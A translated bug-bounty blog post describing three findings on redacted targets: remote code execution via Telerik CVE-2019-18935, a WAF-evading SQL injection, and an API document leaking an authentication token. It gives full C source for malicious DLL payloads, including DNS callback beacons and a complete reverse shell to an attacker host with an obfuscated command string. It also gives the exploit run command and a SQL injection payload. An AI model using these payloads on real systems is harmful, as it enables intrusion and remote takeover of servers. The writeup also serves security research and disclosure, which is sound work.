Title: Remember the essay on web vulnerability mining

Some loopholes have been dug recently. Although it has been repeated, it has reference value. Let me share it with you here.

It is still very uncomfortable to repeat the loopholes. When you think about it, life is never satisfactory. Repeating loopholes does not mean failure. It is important to come first and then come, and the order of appearance is important.

1. A certain site rce ignores the reason : is not in the scope Author priest me Thanks to the priest for taking me to test the domain name :https://***.***:8089/

CVE-2017-11357 CVE-2019-18935 CVE-2017-9248 vulnerability exists

Vulnerability Exploit Download Address :

https://github.com/noperator/CVE-2019-18935

https://github.com/noperator/CVE-2019-18935.git

Delay 11s:sleep 11s:

Test code : test.c

#include windows.h

#include stdio.h

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)

{

if (fdwReason==DLL_PROCESS_ATTACH)

//Sleep(10000); //Time interval in millionseconds.

Sleep(11000);

return TRUE;

}

test.c compiles to amd642.dll file

Run :python CVE-2019-18935.py -v 2017.1.228 -p payloads\amd642.dll -u https://***.****:8089/Telerik.Web.UI.WebResource.axd?type=rau

The first step is to verify successfully, the success delay is about 11s, the original request is 2s

Test command execution :

#include windows.h

#include stdio.h

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)

{

if (fdwReason==DLL_PROCESS_ATTACH)

system('cmd.exe /c nslookup rsmwe.dnslog.cn');

system('cmd.exe /c nslookup 2pstpep28u6vl9qrw0lhjwsr9if83x.burpcollaborator.net');

return TRUE;

}test.c compiles to amd642.dll file

Run again to view dnslog:

Direct rebound shell, general exp:

#include winsock2.h

#include stdio.h

#include windows.h

#pragma comment(lib, 'ws2_32')

#define HOST '{vps ip}'

#define PORT {port}

WSADATA wsaData;

SOCKET Winsock;

SOCKET Sock;

struct sockaddr_in hax;

char aip_addr[16];

STARTUPINFO ini_processo;

PROCESS_INFORMATION processo_info;

//Adapted from https://github.com/infoskirmish/Window-Tools/blob/master/Simple%20Reverse%20Shell/shell.c

void ReverseShell()

{

WSAStartup(MAKEWORD(2, 2), wsaData);

Winsock=WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

struct hostent *host=gethostbyname(HOST);

strcpy(aip_addr, inet_ntoa(*((struct in_addr *)host-h_addr)));

hax.sin_family=AF_INET;

hax.sin_port=htons(PORT);

hax.sin_addr.s_addr=inet_addr(aip_addr);

WSAConnect(Winsock, (SOCKADDR*)hax, sizeof(hax), NULL, NULL, NULL, NULL, NULL);

if (WSAGetLastError()==0) {

memset(ini_processo, 0, sizeof(ini_processo));

ini_processo.cb=sizeof(ini_processo);

ini_processo.dwFlags=STARTF_USESTDHANDLES;

ini_processo.hStdInput=ini_processo.hStdOutput=ini_processo.hStdError=(HANDLE)Winsock;

char *myArray[4]={ 'cm', 'd.e', 'x', 'e' };

char command[8]='';

snprintf(command, sizeof(command), '%s%s%s', myArray[0], myArray[1], myArray[2], myArray[3]);

CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, ini_processo, processo_info);

}

}

DWORD WINAPI MainThread(LPVOID lpParam)

{

ReverseShell();

return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)

{

HANDLE hThread;

if (fdwReason==DLL_PROCESS_ATTACH)

hThread=CreateThread(0, 0, MainThread, 0, 0, 0);

return TRUE;

}

The permissions are not low, it is the domain user :

2. SQL injection : Background introduction : A friend sent an injection. This injection is quite tricky. There is a waf of xx cloud, and the backend filters commas, odd and double quotes, and regular functions. My idea is very simple, hexadecimal. Just regexp function, I think there should be other ideas.

(case+when+current_user+regexp+0x*+then+1+else+2*1e308+end) This way, the database user is created.

Here I want to talk about the case when statement. The case when statement is much more flexible than we imagined. Here I will take a note and talk about :

The most common :

Say something unusual, I write two demos, and I can keep going to do it :

case 1=1 when 2=2 then 1=1 else 1/0 end

3.url jump + identity authentication token leak : I dug it last night, and the reason I ignore is duplicate. Sometimes I am quite speechless to some manufacturers, and the vulnerabilities are there and they are not fixed. It gave me an illusion, found a loophole, and had the illusion of stepping on a honeypot. The asset range is :vc-*.xxx.com

Actually, I am quite happy to encounter this range because I can make a simple fuzz, and I found a lot of assets.

Open one by one and watch, visit :vc-ss.xxx.com, visit the site, and jump directly to ask for login.

I am not a god, and I don’t have an account either. I looked at js and found no access to path information.

Starting with fuzz, it’s easy to do if you know it’s php. Use ffuf to run the php/api dictionary and run to an interface development document /api/***.html

The original intention of the interface development document is good, but the screenshot information/interface information on most interface development documents may be at risk of secondary vulnerability exploitation. Although the screenshot information is all plain text, unfortunately after testing, I found that almost all interfaces have direct access to 401, and identity authentication is required. I was a little helpless. When I wanted to give up, I always told myself to persist and read carefully after reading. I continued to stare at the interface document and kept flipping around and found an identity token leak and some other security vulnerabilities.

I submitted the loophole and received a duplicate message in the morning :

Original link: https://www.cnblogs.com/piaomiaohongchen/p/17130283.html